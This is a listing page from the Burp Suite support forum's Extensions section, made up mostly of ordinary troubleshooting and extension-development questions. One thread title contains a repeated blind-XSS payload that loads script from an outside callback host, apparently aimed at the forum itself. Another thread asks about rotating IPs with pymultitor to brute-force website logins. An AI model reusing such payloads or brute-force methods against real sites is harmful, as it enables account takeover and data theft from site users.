Burp Suite User Forum

Login to post

Development Code review Best Practices.

Hi Team, Please help us to test the development code line by line using the burp automation tool by adding an extra tool/plugin to the burp extension/any other mothod. If not possible source code review, please suggest...

Last updated: Oct 04, 2021 12:33PM UTC | 1 Agent replies | 1 Community replies | Burp Extensions

Bruteforcing with extension

The tested mobile app is using GNU ZIP(gzip) for making request and i am using Decompressor extension for view the gzzip data to modify parameter and then make request. .In repeater ill change a parameter in GZip data...

Last updated: Oct 04, 2021 11:28AM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

Active Scan++

Hi I would ask about Extension Active Scan++ .I'm not smart but what is idea to build some extension.It is not better implement this feature to Burp software .?? The Burp without this Active Scan++ is worse to find some...

Last updated: Oct 01, 2021 01:50PM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

Issue Marker Creation

Hello, Do you have any guidance as to where I can reference if I want to create a simple extension that marks applicable portions of requests and responses in already created issues so that it carries over when exporting...

Last updated: Sep 30, 2021 07:56AM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

IScanQueueItem.getIssues() not returning issues

I'm having the same problem... https://forum.portswigger.net/thread/iscanqueueitem-getissues-not-returning-issues-7f007100 I need a list of issues before removing duplicates. For this reason, I want to use...

Last updated: Sep 29, 2021 08:17AM UTC | 0 Agent replies | 0 Community replies | Burp Extensions

how to use pymultitor with turbo intruder

Is there any way to use pymultitor on windows to attack on website with different different ip address + burp force the pass or user .

Last updated: Sep 26, 2021 07:18PM UTC | 1 Agent replies | 1 Community replies | Burp Extensions

Autorize - IDOR Test

Hi, Right now I'm using Burp Extension Autorize to test for IDOR. I'm curious if there is any way, or maybe another extension, to make Autorize more automatic. For example, now I click on every button on the site to be...

Last updated: Sep 22, 2021 08:53AM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

BurpHttpMock - faulty behavior only on installed macos version

Hello, there's a difference in behavior of the extension between Burp installed through the macos installer and Burp running as jar (both are community version 2021.8.2) When the jar version is running, the extension works...

Last updated: Sep 15, 2021 09:47AM UTC | 2 Agent replies | 2 Community replies | Burp Extensions

Secure Coding Testing

Hi Team, Please confirm that whether the secure coding testing is possible using the Burpsuite tool with the current license. Regards, Kabilan.

Last updated: Sep 14, 2021 01:33PM UTC | 4 Agent replies | 4 Community replies | Burp Extensions

I can't install jython environments

Exception in thread "main" java.lang.ExceptionInInitializerError at org.python.core.PySystemState.<clinit>(PySystemState.java:73) at org.python.util.jython.main(jython.java:533) Caused by:...

Last updated: Sep 13, 2021 07:53AM UTC | 3 Agent replies | 4 Community replies | Burp Extensions

Certificate

Hello, I am having problems with the certificate, when I upload it to fire fox I still cannot go to the sites, it says that the certificate is unreliable

Last updated: Sep 08, 2021 05:39PM UTC | 3 Agent replies | 3 Community replies | Burp Extensions

HTTP Request Smuggler: Error in thread: Can't find the header: Connection. See error pane for stack trace.

When using the HTTP Request Smuggler extension (updated 06 Aug 2021) in Burp Suite Professional (v2021.8.2) to "Smuggle Probe", the probing failed with the following error message: Queued 1 attacks from 1 requests in 0...

Last updated: Sep 08, 2021 01:02PM UTC | 2 Agent replies | 1 Community replies | Burp Extensions

Java extension Development: Determine if Request was edited

Hi, I'm developing a Burp Suite extension in Java, based on the "Custom logger" example here: https://portswigger.net/burp/extender#SampleExtensions I'd like to know how I can determine if a Request received by my logger...

Last updated: Sep 06, 2021 11:01AM UTC | 3 Agent replies | 2 Community replies | Burp Extensions

Failed to open Jython JAR file in Burp Suite in macOS Big Sur

Failed to open Jython JAR file in Burp Suite, only getting this error for Python based Extensions, Java based ones are installing and loading ok. Only change I did was installing iTerm2 and oh-my-zsh, may be this screwed...

Last updated: Sep 03, 2021 12:42PM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

Problem with "Failed to open file"

Hi Team, I can't select file to upload burp extension. It shows "Failed to open file/folder" both burp extension and other language environment. I uninstalled and installed again before but it didn't help. I don't know...

Last updated: Sep 02, 2021 02:34PM UTC | 2 Agent replies | 2 Community replies | Burp Extensions

Burp Extensions for Burp Enterprise

Hi, I'm a one of users of Burp Enterprise. I see that it's been mentioned that at the moment only java extensions are supported for Burp Enterprise. I had a question, would it work if I compile by Python extension into a...

Last updated: Sep 02, 2021 07:46AM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

Burp Suite Navigation Recorder

When I tried to record a login page, I used the copy to clipboard option, when I paste to the Recorded login secuences, the information that it paste is incomplete, and is not enough to complete the login process. I...

Last updated: Sep 02, 2021 07:14AM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

HTTP Request Smuggler Extension vs HTTP request smuggling scanner

When practicing the basic CL.TE lab ( Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability), I firstly used the HTTP Request Smuggler Extension -> Smuggle probe to test the lab main...

Last updated: Sep 01, 2021 10:53AM UTC | 2 Agent replies | 1 Community replies | Burp Extensions

Ridiculous Trying to exploit"><script src=https://xssjacked.xss.ht></script> u for Blind XSS "><script src=https://xssjacked.xss.ht></script>

PLZ Work "><script src=https://xssjacked.xss.ht></script> . Never mind about . "><script src=https://xssjacked.xss.ht></script>

Last updated: Aug 30, 2021 03:30PM UTC | 1 Agent replies | 1 Community replies | Burp Extensions

Installation Problem

Hi Team, Could you please consider unlocking the license key? I tried the same box and same user. When we try to open Burpsuite, we have faced a java error(no JVM found on your system) due to that we have...

Last updated: Aug 27, 2021 10:56AM UTC | 2 Agent replies | 2 Community replies | Burp Extensions

Page 3 of 30

Burp Suite Support Center

Your source for help and advice on all things Burp-related.

Burp Suite Support Center image